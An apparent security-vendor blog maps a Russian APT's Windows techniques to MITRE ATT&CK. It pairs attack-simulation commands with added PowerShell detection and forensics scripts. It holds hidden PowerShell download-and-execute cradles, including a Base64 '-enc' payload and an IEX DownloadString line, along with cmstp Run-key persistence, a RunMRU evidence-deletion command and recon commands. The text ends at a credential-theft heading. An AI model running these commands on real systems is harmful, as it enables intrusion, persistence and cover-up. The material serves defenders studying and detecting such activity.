Gossamer Bear APT: Windows Endpoint Campaign Explained
Gossamer Bear (also tracked as Callisto, Blue Charlie, Star Blizzard, COLDRIVER, and TA446) is a Russian state-sponsored threat group associated with the FSB’s 18th Center. Active since at least 2016, it conducts cyber-espionage campaigns targeting government, defense, academic, and policy organizations across NATO member states, the US, and Ukraine.
Gossamer Bear is best known for highly tailored spear-phishing operations that harvest credentials through fake login portals and malicious domains. The group maintains long-term access for intelligence collection and occasionally conducts hack-and-leak operations to influence public narratives. Its activities demonstrate a strong alignment with Russian geopolitical interests, making it a persistent and sophisticated adversary focused on strategic espionage rather than financial gain.
In this blog, we examine Gossamer Bear's Windows endpoint campaign, mapped to the MITRE ATT&CK framework.
Defense Evasion
T1218.011 - System Binary Proxy Execution: Rundll32
Executing a DLL via Rundll32
Goal: Gossamer Bear loads a malicious DLL with rundll32.exe to run code while blending with a trusted OS binary.
Method: Drop the DLL to a writable folder (e.g., %TMP%) and invoke it with rundll32, calling a specific exported function to execute the payload.
How it hides
• Runs under a signed Windows binary, avoiding simple allowlists.
• No obvious EXE on disk — logic executes inside the DLL.
• Can be concealed by a proxy parent (e.g., winver.exe), muddying process lineage.
How Does Picus Help?
Picus SCV runs the same sequence to validate whether endpoint controls and telemetry detect DLL execution via rundll32 and whether the parent-child process chain is visible to defenders.
#Process 1 rundll32.exe "%TMP%\vmtools.dll",fjdpw03d {predefined-process-list} winver.exe
Payload explanation
- Process 1: rundll32 loads the attacker DLL from %TMP% and calls its exported function (fjdpw03d); the {predefined-process-list} winver.exe token names the parent the simulation launches it from.
- Process 2: winver.exe acts as the benign proxy parent, so the lineage reads winver.exe -> rundll32.exe instead of cmd.exe or powershell.exe -> rundll32.exe.
The sequence mimics dropping a DLL to a writable location and executing it via a trusted system binary. This is proxy execution rather than injection or fileless execution: the DLL is a file on disk loaded into rundll32's own process, so the DLL path in the command line (Sysmon Event ID 1, or Security 4688 with command-line auditing), the image load from a user-writable directory (Sysmon Event ID 7) and the unusual parent are the signals to key on.
T1197 - BITS Jobs
Executing Bitsadmin Command
Goal: Gossamer Bear uses BITS jobs to quietly download and stage payloads via a trusted Windows utility.
Method: Create a BITS job, copy/rename bitsadmin.exe into %TMP%, and stage files there for later execution.
Why it works for the attacker
- Trusted binary — signed, often allowed.
- Resilient transfer — jobs survive reboots and network drops.
- Post-transfer execution — can run a program when the job completes.
How Does Picus Help?
The Picus SCV module runs the same sequence to validate whether endpoint controls, monitoring, and detection rules catch the file, job and process activity associated with BITS abuse. BITS job state is kept in the qmgr database under %ALLUSERSPROFILE%\Microsoft\Network\Downloader rather than in the registry, and the job lifecycle is logged in Microsoft-Windows-Bits-Client/Operational (Event IDs 3, 59, 60 and 4 for job creation, transfer start, transfer stop and completion). The module verifies whether security controls flag renamed LOTL binaries (the PE OriginalFileName still reads bitsadmin.exe after a copy or rename), unusual copies to %TMP%, or BITS job creation and execution.
#Process 1
#Process 2
Payload explanation
- Process 1 creates a BITS job named test.
- Process 2 places a trusted utility (bitsadmin.exe) in %TMP% under a benign name to reduce suspicion and avoid blocking by path- or name-based allowlists.
- Process 3 uses the copied binary to add a file to the job, pairing a legitimate remote source path with a local target path in %TMP%. Creating a job and adding files does not start the transfer: a follow-up /resume activates the queued job (after an optional /setpriority), while /transfer is the one-shot form that creates, runs and completes a job in a single command. The post-transfer execution noted above comes from /SetNotifyCmdLine, which has the BITS service launch a program when the job completes.
The sequence mimics an attacker using a signed, living off the land binary to perform resilient downloads and to stage or execute payloads while minimizing noisy telemetry and file artifacts.
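The PowerShell below is an added example, not Picus or Gossamer Bear tooling: it scores constructed process-creation records (Sysmon Event ID 1 field names) for the rundll32 and bitsadmin patterns of the two techniques above. The sample records, the svchost.exe rename and the expected-parent list are assumptions. The renamed-binary check rests on the PE's OriginalFileName, which survives a copy or rename while the on-disk name does not.

```powershell
# Added example: detection logic over constructed process-creation records.
# Field names follow Sysmon Event ID 1; the records themselves are constructed samples.
$SampleEvents = @(
    # rundll32 loading a DLL from %TMP%, launched from winver.exe as a proxy parent
    [pscustomobject]@{
        Image            = 'C:\Windows\System32\rundll32.exe'
        OriginalFileName = 'RUNDLL32.EXE'
        CommandLine      = 'rundll32.exe "C:\Users\alice\AppData\Local\Temp\vmtools.dll",fjdpw03d'
        ParentImage      = 'C:\Windows\System32\winver.exe'
    }
    # bitsadmin.exe copied to %TMP% as svchost.exe (assumed name): the image changes, OriginalFileName does not
    [pscustomobject]@{
        Image            = 'C:\Users\alice\AppData\Local\Temp\svchost.exe'
        OriginalFileName = 'bitsadmin.exe'
        CommandLine      = 'svchost.exe /SetNotifyCmdLine test C:\Users\alice\AppData\Local\Temp\update.exe NULL'
        ParentImage      = 'C:\Windows\System32\cmd.exe'
    }
    # Benign control: rundll32 from Explorer with a system DLL
    [pscustomobject]@{
        Image            = 'C:\Windows\System32\rundll32.exe'
        OriginalFileName = 'RUNDLL32.EXE'
        CommandLine      = 'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'
        ParentImage      = 'C:\Windows\explorer.exe'
    }
)

# Directories a standard user can write to; regex fragments matched against full paths
$UserWritableDirs = '\\Temp\\', '\\AppData\\', '\\ProgramData\\', '\\Public\\', '\\Downloads\\'
# Parents that legitimately spawn rundll32 on a workstation (assumed list; tune per environment)
$ExpectedRundll32Parents = 'explorer.exe', 'svchost.exe', 'services.exe', 'msiexec.exe'

function Get-Leaf ([string] $Path) { (($Path -split '[\\/]')[-1]).ToLower() }

function Test-ProcessEvent {
    param([Parameter(Mandatory)] $Event)
    $reasons = @()
    $image  = Get-Leaf $Event.Image
    $orig   = $Event.OriginalFileName.ToLower()
    $parent = Get-Leaf $Event.ParentImage

    # 1. Renamed LOLBin: the PE's OriginalFileName survives a copy/rename, the file name does not
    if (($orig -in 'bitsadmin.exe', 'rundll32.exe') -and $orig -ne $image) {
        $reasons += "renamed $orig running as $image"
    }
    # 2. rundll32 pointed at a DLL in a user-writable directory
    if ($orig -eq 'rundll32.exe' -and ($UserWritableDirs | Where-Object { $Event.CommandLine -match $_ })) {
        $reasons += 'rundll32 DLL in user-writable directory'
    }
    # 3. rundll32 under a parent that does not normally spawn it (proxy parent such as winver.exe)
    if ($orig -eq 'rundll32.exe' -and $parent -notin $ExpectedRundll32Parents) {
        $reasons += "unexpected rundll32 parent $parent"
    }
    # 4. bitsadmin job creation, staging, activation or post-transfer execution
    if ($orig -eq 'bitsadmin.exe' -and $Event.CommandLine -match '(?i)/(create|addfile|resume|transfer|SetNotifyCmdLine)\b') {
        $reasons += 'bitsadmin job/staging/notify flag'
    }
    [pscustomobject]@{
        Image      = $Event.Image
        Parent     = $Event.ParentImage
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

$SampleEvents | ForEach-Object { Test-ProcessEvent $_ } | Format-List
```

Run against the three constructed records, the first two come back Suspicious with their reasons listed and the Explorer-launched control does not. In production the same function consumes Get-WinEvent output from the Sysmon channel; the OriginalFileName check is the part that survives the rename in Process 2.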
T1070 - Indicator Removal
Deleting All Run Command Logs via RunMRU Registry Key
Goal: Gossamer Bear targets the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) to erase the Windows Run dialog history (Win+R), removing a key source of forensic evidence about commands executed in the user's session. This is registry artifact removal, not event log clearing, which is why it sits under the parent technique rather than T1070.001.
Method: The actor uses the native reg.exe utility to manipulate the key. By first ensuring the key exists and then force-deleting it, the adversary removes in one step the command-history artifacts that investigators rely on to reconstruct activity.
How it hides
• Uses a trusted, signed system binary (reg.exe), blending with normal admin activity.
• Operates at the registry level, so no file is dropped; the deletion is only recorded if registry auditing with a SACL on the key (Security 4660/4663) or Sysmon Event ID 12 (registry object deleted) is in place.
How Does Picus Help?
The Picus SCV module runs the same sequence to validate detection and response coverage for registry-based evidence removal. It demonstrates how an attacker can erase Run history and verifies whether logging/alerting catches the behavior.
#Process 1
#Process 2
Payload explanation
- Process 1 writes a value to RunMRU so the key and its expected structure (lettered values plus an MRUList ordering value) exist for the follow-up delete.
- Process 2 invokes reg.exe delete on the key with /f to force immediate deletion without a confirmation prompt.
The sequence mimics rapid, trusted-binary cleanup of command-history evidence, testing whether endpoint and SIEM controls detect the deletion or retain sufficient telemetry for post-incident investigation.
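As an added example (not code from the Picus post or the actor), the following PowerShell reconstructs the Run history from the key's structure: RunMRU stores each command in a single-letter value with a trailing \1 marker, and the MRUList value lists those letters most-recent-first. The constructed sample hashtable is an assumption; Get-RunMruHistory reads the live key for the current user and returns nothing if the key has been deleted.

```powershell
# Added example: reconstruct Run-dialog history from RunMRU, then read the live key.

function ConvertFrom-RunMru {
    # $Values maps value name -> data exactly as stored under the RunMRU key
    param([Parameter(Mandatory)] [hashtable] $Values)
    if (-not $Values.ContainsKey('MRUList')) { return @() }
    # MRUList is a string of single-letter value names, most recent first
    foreach ($letter in $Values['MRUList'].ToCharArray()) {
        $name = [string] $letter
        if ($Values.ContainsKey($name)) {
            [pscustomobject]@{
                Slot    = $name
                # Each entry is "<command>\1"; strip the trailing marker
                Command = ($Values[$name] -replace '\\1$', '')
            }
        }
    }
}

function Get-RunMruHistory {
    $path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $path)) {
        # Explorer creates the key on first Win+R use; on a workstation with an active
        # interactive user, an absent key is itself a finding consistent with the reg delete above.
        Write-Warning "RunMRU key not present for the current user"
        return
    }
    $item = Get-Item $path
    $values = @{}
    foreach ($name in $item.GetValueNames()) { $values[$name] = $item.GetValue($name) }
    ConvertFrom-RunMru -Values $values
}

# Constructed sample of key contents (assumed, not captured from a real host):
# order of use was a, b, c, so MRUList reads "cba" (newest first)
$Sample = @{
    'MRUList' = 'cba'
    'a'       = 'cmd\1'
    'b'       = 'powershell -nop -w hidden\1'
    'c'       = 'regedit\1'
}

ConvertFrom-RunMru -Values $Sample | Format-Table -AutoSize
Get-RunMruHistory | Format-Table -AutoSize
```

The ordered output from ConvertFrom-RunMru is what a forensic timeline needs and what the force-delete destroys; pairing Get-RunMruHistory with a Sysmon Event ID 12 filter on TargetObject ending in \Explorer\RunMRU gives both the artifact and the record of its removal.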
Execution
T1059.001 - Command and Scripting Interpreter: PowerShell
Executing an Encoded PowerShell Command
Goal: Gossamer Bear issues a single command that downloads a Base64-encoded PowerShell payload from a remote host and hands it to a second PowerShell instance that runs it directly in memory, so the second stage never takes a form that file-based signature scanning sees.
Method: The actor abuses PowerShell as a living-off-the-land tool: the first stage fetches the encoded string with System.Net.WebClient.DownloadString and launches a child powershell.exe with -enc, so the final payload is never written to disk.
How it hides: The payload travels as a Base64 string, and the launcher uses -NoP (no profile), -NonI (non-interactive) and -W hidden (hidden window) to suppress any visible window and minimize user-facing artifacts.
How Does Picus Help?
powershell.exe -NoP -sta -NonI -W hidden -c "$e=(New-Object System.Net.webClient).downloadString('%remotefile-66%');powershell -enc $e"
Payload explanation
- Downloads a Base64-encoded next-stage payload from a remote host into memory.
- Passes that string to a child powershell.exe -enc, which decodes it (the encoding is UTF-16LE, not UTF-8) and executes it in memory; no final file is written.
- Keeps the whole chain on one line with a hidden window to reduce observable artifacts and blunt simple signature- or user-based detection.
Fileless does not mean invisible: the child's full Base64 argument appears in process-creation telemetry (Security 4688 with command-line auditing, Sysmon Event ID 1), and with Script Block Logging enabled the decoded script lands in Microsoft-Windows-PowerShell/Operational Event 4104.
This safely mimics Gossamer Bear performing multi-stage, fileless code execution where the malicious logic is obscured by both network delivery and Base64 encoding.
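The following PowerShell is an added example, not part of the original post: it pulls the Base64 argument out of a command line as recorded in process-creation telemetry and decodes it, and it builds a constructed sample command line (the example.invalid URL and the script text are assumptions) the way the first stage above builds its child invocation.

```powershell
# Added example: decode the -EncodedCommand argument seen in process-creation telemetry.

function Get-DecodedCommand {
    param([Parameter(Mandatory)] [string] $CommandLine)
    # powershell.exe accepts several abbreviations of -EncodedCommand; match them all
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
    # -enc expects UTF-16LE; decoding as UTF-8 would yield text interleaved with NUL characters
    [Text.Encoding]::Unicode.GetString($bytes)
}

function ConvertTo-EncodedCommand ([string] $Script) {
    # Inverse operation, as the first stage's remote server must perform before serving $e
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# Constructed second stage (assumed content; example.invalid never resolves)
$stage2 = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s")'
# The child command line the first stage produces: "powershell -enc <base64>"
$sampleCmdLine = "powershell -enc $(ConvertTo-EncodedCommand $stage2)"

$sampleCmdLine
Get-DecodedCommand -CommandLine $sampleCmdLine
```

Feeding Get-DecodedCommand the CommandLine field of Sysmon Event ID 1 or Security 4688 records turns the opaque Base64 blob into the script text, which is the same content Event 4104 would show if Script Block Logging were on.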
Requesting a URL using a PowerShell Web Request
Goal: Gossamer Bear uses PowerShell’s built-in web request feature to contact a remote server and download external content or payloads directly into memory.
Method: Leverage Invoke-WebRequest to fetch remote files or scripts over HTTP(S) using native PowerShell functionality, eliminating the need for external utilities.
How it hides
- Uses a trusted Windows binary (powershell.exe) already present on the system.
- Transfers data over standard web protocols, blending with normal network traffic.
- Can download and execute payloads without saving them to disk.
How Does Picus Help?
Picus SCV runs the same PowerShell command to confirm whether endpoint and network controls detect outbound connections and remote file retrievals initiated via PowerShell.
powershell.exe -c "Invoke-WebRequest -Uri %remotefile-11085%"
Payload explanation
- Sends a web request to %remotefile-11085%, retrieving remote content using Invoke-WebRequest.
- Demonstrates how attackers can use native PowerShell networking to download or stage payloads without external tools.
- Safely replicates an ingress transfer technique to validate network monitoring and script execution detection. Unless the actor overrides it with -UserAgent, the default User-Agent that Invoke-WebRequest sends identifies PowerShell, so proxy and web logs are a second detection source alongside the process command line.
Persistence
T1053.005 - Scheduled Task/Job: Scheduled Task
Creating a New Scheduled Task by using COM TaskScheduler Class
Goal: Gossamer Bear drops and runs a script that registers a new scheduled task to achieve persistence.
Method: Place a script in a writable location (e.g., %TMP%) and execute it with PowerShell; the script uses the TaskScheduler COM API to create a task that runs on a schedule or at logon.
How it hides
- Persists via a legitimate Windows scheduling mechanism.
- Task runs under normal system/user context, blending with legitimate scheduled tasks.
- No obvious one-off process; activity appears as routine task registration.
How Does Picus Help?
Picus SCV executes the same script-and-register pattern to verify whether endpoint controls, scheduled-task monitoring, and change-logging detect the new task.
powershell.exe -c "%TMP%\scheduledTask.ps1"
Payload explanation
- Runs the dropped PowerShell script, which uses the Schedule.Service COM interface (ITaskFolder.RegisterTaskDefinition) to create a scheduled task that will execute on a trigger (e.g., logon or time).
- Mimics an attacker achieving durable persistence through a legitimate scheduling API while minimizing noisy process activity: no schtasks.exe child process appears, so detection depends on the task XML appearing under C:\Windows\System32\Tasks, the TaskCache entries under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule, Event 106 in Microsoft-Windows-TaskScheduler/Operational (not enabled by default on every build) and Security 4698 where object-access auditing is on.
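An added example of the defensive counterpart, not code from the Picus post: the hunt below walks every task folder through the same Schedule.Service COM interface a registering script would use, parses each task's XML, and flags Exec actions that run a script host or point into a user-writable directory. The script-host and directory lists are assumptions to tune per environment; run it elevated so that every task's XML is readable.

```powershell
# Added example: hunt scheduled tasks via the Schedule.Service COM interface.

function Get-SuspiciousScheduledTask {
    param(
        [string[]] $WritableDirs = @('\\Temp\\', '\\AppData\\', '\\ProgramData\\', '\\Public\\', '\\Downloads\\'),
        [string[]] $ScriptHosts  = @('powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe',
                                     'rundll32.exe', 'regsvr32.exe', 'cmstp.exe', 'cmd.exe')
    )
    $svc = New-Object -ComObject 'Schedule.Service'
    $svc.Connect()                                   # local machine, current credentials
    $pending = New-Object System.Collections.Queue
    $pending.Enqueue($svc.GetFolder('\'))
    while ($pending.Count -gt 0) {
        $folder = $pending.Dequeue()
        foreach ($sub in $folder.GetFolders(0)) { $pending.Enqueue($sub) }
        foreach ($task in $folder.GetTasks(1)) {     # 1 = TASK_ENUM_HIDDEN: include hidden tasks
            [xml] $xml = $task.Xml
            foreach ($exec in @($xml.Task.Actions.Exec)) {
                if ($null -eq $exec) { continue }    # ComHandler/email actions carry no Exec node
                $command   = [string] $exec.Command
                $arguments = [string] $exec.Arguments
                $action    = ("$command $arguments").Trim()
                $leaf      = (($command -split '[\\/]')[-1]).ToLower().Trim('"')
                $reasons   = @()
                if ($leaf -in $ScriptHosts) { $reasons += "script host $leaf" }
                if ($WritableDirs | Where-Object { $action -match $_ }) { $reasons += 'user-writable path in action' }
                if ($reasons) {
                    [pscustomobject]@{
                        Path    = $task.Path
                        Action  = $action
                        Author  = [string] $xml.Task.RegistrationInfo.Author
                        Date    = [string] $xml.Task.RegistrationInfo.Date
                        Reasons = ($reasons -join '; ')
                    }
                }
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-Table -AutoSize
```

Legitimate software registers tasks under AppData too (updaters are the usual case), so the point of the Author and Date columns is to triage hits against known vendors and against the time window of the suspected intrusion rather than to alert on every match.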
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Creating a New Registry Key "System Health Check" in HKLM Hive
Goal: Gossamer Bear adds a registry Run key so a payload launches automatically at boot or user logon.
Method: Write an autorun entry under the HKLM Run key that points to a signed, trusted binary invoked with a crafted argument to execute attacker-controlled code.
How it hides
- Uses registry autorun — a common, legitimate autostart method.
- Points to a system binary (cmstp.exe) to blend with normal activity.
- Uses an INF/installer argument to run silently, reducing visible prompts.
How Does Picus Help?
Picus SCV writes the same Run-key entry to validate detection of registry persistence and whether execution via a trusted helper binary is captured by endpoint and SIEM controls.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SystemHealthCheck /d "cmstp.exe /s c:\programdata\DefenderService.inf" /f
Payload explanation
- Creates the SystemHealthCheck Run value that launches cmstp.exe with an INF file argument. HKLM Run values fire at each interactive user logon (not at boot), and writing them requires administrative rights, so this step also implies the actor already holds elevated access on the host.
- Simulates an attacker achieving persistent execution by chaining a trusted OS binary with a crafted installer file: cmstp.exe /s performs a silent Connection Manager profile install, and a RunPreSetupCommandsSection in the INF lets that install launch arbitrary commands. The test checks whether persistence via registry autorun and helper-binary invocation is detected.
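The following PowerShell is an added example and not part of the original post: it reads the Run and RunOnce keys in both hives (plus the WOW6432Node view), keeps REG_EXPAND_SZ data unexpanded, and flags values whose first token is a signed helper binary such as cmstp.exe, that reference a user-writable directory, or that chain cmstp.exe with an .inf file. The helper list and path patterns are assumptions.

```powershell
# Added example: enumerate Run/RunOnce autoruns and flag helper-binary chains.

function Get-SuspiciousAutorun {
    $keys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
        'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Signed helpers that execute attacker-supplied input (INF, DLL, script, command); assumed list
    $helpers = 'cmstp.exe', 'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'powershell.exe',
               'wscript.exe', 'cscript.exe', 'msiexec.exe', 'cmd.exe'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item $key
        foreach ($name in $item.GetValueNames()) {
            # Keep %VAR% unexpanded so the raw REG_EXPAND_SZ content is what gets inspected
            $data = [string] $item.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
            # First token is the launched image: a quoted path, or everything up to the first space
            $exe  = if ($data -match '^"([^"]+)"') { $Matches[1] } else { ($data -split '\s+')[0] }
            $leaf = (($exe -split '[\\/]')[-1]).ToLower()
            $reasons = @()
            if ($leaf -in $helpers) { $reasons += "helper binary $leaf" }
            if ($data -match '(?i)\\(Temp|ProgramData|Public|Downloads)\\|%TMP%|%TEMP%') {
                $reasons += 'user-writable path'
            }
            if ($leaf -eq 'cmstp.exe' -and $data -match '(?i)\.inf\b') {
                $reasons += 'cmstp INF install: RunPreSetupCommandsSection can run arbitrary commands'
            }
            if ($reasons) {
                [pscustomobject]@{
                    Key     = $key
                    Name    = $name
                    Type    = $item.GetValueKind($name)
                    Data    = $data
                    Reasons = ($reasons -join '; ')
                }
            }
        }
    }
}

Get-SuspiciousAutorun | Format-List
```

On a host where the reg add above has run, the SystemHealthCheck value is reported with all three reasons; a Sysmon Event ID 13 filter on TargetObject matching \CurrentVersion\Run\ catches the write itself at the moment it happens.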
Discovery
T1217 - Browser Information Discovery
Enumerating Installed Browsers via Registry Keys
Goal: Gossamer Bear identifies which browsers are installed to target browser-specific TTPs (extensions, profiles, or credential theft).
Method: Query browser-related registry keys (or run a small enumerator) to list installed browsers and versions.
How Does Picus Help?
%TMP%\GetBrowserList.exe
Payload explanation
- Executes a small tool that reads browser-related registry keys and reports installed browsers and versions.
- Simulates an attacker inventorying browser targets to plan follow-on collection or exploit activity.
Gathering Browser Bookmarks using a PowerShell Script
Goal: Gossamer Bear harvests browser bookmarks and profile data to locate saved URLs, SSO flows, and high-value targets for credential/session collection.
Method: Relax local PowerShell execution policy, import a collection module from %TMP%, and extract bookmark/profile artifacts for the targeted browser.
How Does Picus Help?
Picus SCV runs the same PowerShell sequence to verify whether script execution, module imports, and filesystem/registry reads used for browser data collection are detected and logged.
#Process 1
Payload explanation
- Process 1 temporarily relaxes the execution policy (e.g., Bypass for the current process) to permit running the collection script. Execution policy is not a security boundary, so this is a telemetry hook rather than a control that stops the actor.
- Process 2 imports the local PowerShell module from %TMP% and runs a function that extracts bookmarks/profile data from the specified browser.
This mimics Gossamer Bear harvesting browser artifacts for reconnaissance and credential/session harvesting, testing detection of scripted collection and local data access.
T1083 - File and Directory Discovery
Finding Files with Specific Extensions
Goal: Gossamer Bear searches the filesystem for documents and office files to locate sensitive data for collection and exfiltration.
Method: Run a recursive file search for common document extensions across drives to build an inventory of candidate files.
How Does Picus Help?
Picus SCV executes the same search to validate whether endpoint and file-monitoring controls detect broad recursive enumeration and suspicious mass-file queries.
cmd.exe /c for %G in (.pdf, .doc, .wps, .docx, .ppt, .xls, .xlsx, .pptx, .rtf) do forfiles /p "C:" /s /M *%G /C "cmd /c echo @PATH"
Payload explanation
- Iterates common document extensions and lists matching file paths across the C: drive, producing an inventory of potentially sensitive files.
The sequence mimics Gossamer Bear performing wide-scale file discovery to identify exfiltration targets or files useful for lateral movement, testing whether file-access monitoring and DLP telemetry surface mass enumeration.
T1087 - Account Discovery
Listing Domain Accounts Using "net user /domain" Command
Goal: Gossamer Bear enumerates domain user accounts to map targets and identify high-value principals.
Method: Use the native net utility to request a list of domain accounts from a joined host or domain controller.
How Does Picus Help?
net.exe user /domain
Payload explanation
- It invokes the Windows Net API to retrieve domain user account listings, producing a concise inventory of usernames and basic account metadata.
This mimics attacker reconnaissance to discover valid accounts for lateral movement, privilege escalation, or targeted credential attacks, testing detection of domain-level enumeration.
Displaying Detailed Configuration Information about a Computer Using "systeminfo"
Goal: Gossamer Bear captures a machine’s inventory (OS build, patch levels, hotfixes, network adapters, domain membership) to profile hosts and select follow-on TTPs.
Method: Run the native systeminfo.exe utility to dump comprehensive system configuration and patch/role details.
How Does Picus Help?
Picus SCV executes the same command to verify whether endpoint telemetry, asset inventory systems, and SIEM ingest this output for detection and context enrichment.
systeminfo.exe
Payload explanation
- It outputs OS version/build, installed hotfixes, boot/timezone info, network adapters, domain/workgroup, and other host metadata.
This gives an attacker the environment context needed for exploit selection and lateral movement, and tests whether such profiling is captured and correlated by defenders.
T1016 - System Network Configuration Discovery
Displaying All Current TCP/IP Network Configuration Using the "ipconfig /all" Command
Goal: Gossamer Bear collects detailed network configuration to map interfaces, IPs, gateways, DNS servers, and routing info useful for lateral movement and reconnaissance.
Method: Run the native ipconfig utility to dump the host’s complete TCP/IP settings.
How Does Picus Help?
Picus SCV runs the same command to verify whether endpoint and network telemetry capture network-inventory queries and surface them for detection or correlation.
ipconfig.exe /all
Payload explanation
- It prints adapter names, IPv4/IPv6 addresses, MACs, DHCP/DNS settings, default gateway, lease info, and connection-specific DNS suffixes.
This output gives an attacker the network topology and routing details needed to plan lateral movement, pivoting, or identify exposed services, and tests whether such enumeration is logged and flagged by defenders.
T1049 - System Network Connections Discovery
Displaying Active TCP Connections Using "Netstat" with -nao Parameters
Goal: Gossamer Bear enumerates active network connections and associated PIDs to identify remote hosts, listening services, and potential command-and-control channels.
Method: Run netstat to list all TCP/UDP sockets, their states, remote endpoints, and owning process IDs.
How Does Picus Help?
Picus SCV runs the same command to verify whether network-connection enumeration is captured by endpoint and network telemetry and correlated with process context.
netstat -nao
Payload explanation
- It outputs local/remote IP:port pairs, connection states, and owning PIDs.
This gives an attacker a map of current network activity and which processes own sockets, aiding identification of C2, lateral pivots, or exposed services, and tests whether defenders link connections to processes for detection.
T1033 - System Owner/User Discovery
Displaying the Current User, Group Memberships and Privileges Using "whoami /all"
Goal: Gossamer Bear collects account and privilege information to find high-privilege contexts and usable credentials.
Method: Invoke whoami to return current user, group membership, and privilege/token details.
How Does Picus Help?
Picus SCV runs the same command to confirm whether account/context enumeration is logged and whether telemetry exposes privilege-escalation opportunities.
whoami.exe /all
Payload explanation
- It prints the current account, SIDs, group memberships, and enabled privileges.
This reveals whether the process runs with elevated rights or membership in sensitive groups, helping attackers choose escalation or lateral-movement paths, and validates detection of privilege-context queries.
T1057 - Process Discovery
Displaying a List of Applications and Services Using "tasklist /v"
Goal: Gossamer Bear inventories running applications and services to identify interesting processes (AV, browsers, mail clients) and candidate parents for process-hiding or injection.
Method: Use tasklist to produce a verbose process list including PID, session, memory, and window title.
How Does Picus Help?
Picus SCV executes the same command to ensure process-enumeration telemetry is collected and that defenders can correlate process listings with suspicious activity.
tasklist.exe /v
Payload explanation
- It outputs process names, PIDs, session IDs, memory usage, and window titles.
This helps an attacker spot security products, user apps with credentials/sessions, or processes suitable for proxying or injection, and tests whether process-enumeration is visible to monitoring tools.
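The commands in this Discovery section are individually unremarkable, so the useful detection is the burst: several distinct discovery tools spawned by one parent process within a short window. The PowerShell below is an added example (not from the Picus post) that implements that rule over constructed process-creation records; the host name, timestamps, PIDs and the 300-second/4-tool thresholds are assumptions.

```powershell
# Added example: discovery-burst rule over constructed process-creation records.
# Field names follow Sysmon Event ID 1 / Security 4688; all values are constructed.

function Get-Leaf ([string] $Path) { (($Path -split '[\\/]')[-1]).ToLower() }

function New-ProcRecord ([string] $Time, [int] $ParentPid, [string] $Image, [string] $CommandLine) {
    [pscustomobject]@{
        Time = [datetime] $Time; Host = 'WS01'; ParentProcessId = $ParentPid
        Image = $Image; CommandLine = $CommandLine
    }
}

$SampleEvents = @(
    New-ProcRecord '2024-05-02T10:00:01' 4120 'C:\Windows\System32\net.exe'        'net.exe user /domain'
    New-ProcRecord '2024-05-02T10:00:04' 4120 'C:\Windows\System32\systeminfo.exe' 'systeminfo.exe'
    New-ProcRecord '2024-05-02T10:00:07' 4120 'C:\Windows\System32\ipconfig.exe'   'ipconfig.exe /all'
    New-ProcRecord '2024-05-02T10:00:09' 4120 'C:\Windows\System32\NETSTAT.EXE'    'netstat -nao'
    New-ProcRecord '2024-05-02T10:00:12' 4120 'C:\Windows\System32\whoami.exe'     'whoami.exe /all'
    New-ProcRecord '2024-05-02T10:00:15' 4120 'C:\Windows\System32\tasklist.exe'   'tasklist.exe /v'
    # Benign noise: an admin running one command hours later from a different parent
    New-ProcRecord '2024-05-02T13:22:40' 9001 'C:\Windows\System32\ipconfig.exe'   'ipconfig.exe /all'
)

function Find-DiscoveryBurst {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds    = 300,
        [int] $MinDistinctTools = 4
    )
    $discoveryTools = 'net.exe', 'net1.exe', 'systeminfo.exe', 'ipconfig.exe', 'netstat.exe',
                      'whoami.exe', 'tasklist.exe', 'nltest.exe', 'forfiles.exe', 'arp.exe', 'route.exe'
    $hits = $Events | Where-Object { (Get-Leaf $_.Image) -in $discoveryTools }
    # The pivot is the parent: the actor's shell or implant spawns each tool in turn
    foreach ($group in ($hits | Group-Object Host, ParentProcessId)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            # Sliding window starting at event i: count distinct tools launched before the deadline
            $deadline = $sorted[$i].Time.AddSeconds($WindowSeconds)
            $window   = @($sorted[$i..($sorted.Count - 1)] | Where-Object { $_.Time -le $deadline })
            $tools    = @($window | ForEach-Object { Get-Leaf $_.Image } | Sort-Object -Unique)
            if ($tools.Count -ge $MinDistinctTools) {
                [pscustomobject]@{
                    Host            = $sorted[$i].Host
                    ParentProcessId = $sorted[$i].ParentProcessId
                    Start           = $sorted[$i].Time
                    DistinctTools   = $tools.Count
                    Commands        = (($window | ForEach-Object { $_.CommandLine }) -join ' ; ')
                }
                break   # one alert per parent process
            }
        }
    }
}

Find-DiscoveryBurst -Events $SampleEvents | Format-List
```

With the sample data the rule fires once, for parent PID 4120 at 10:00:01 with six distinct tools, and stays silent for the lone ipconfig run. Grouping on the parent rather than the user is what keeps interactive administrators, who run these commands one at a time across a day, below the threshold.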
Credential Access
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Gathering Browser Credentials via Chrome App-Bound Encryption (ABE) Decryption Tool
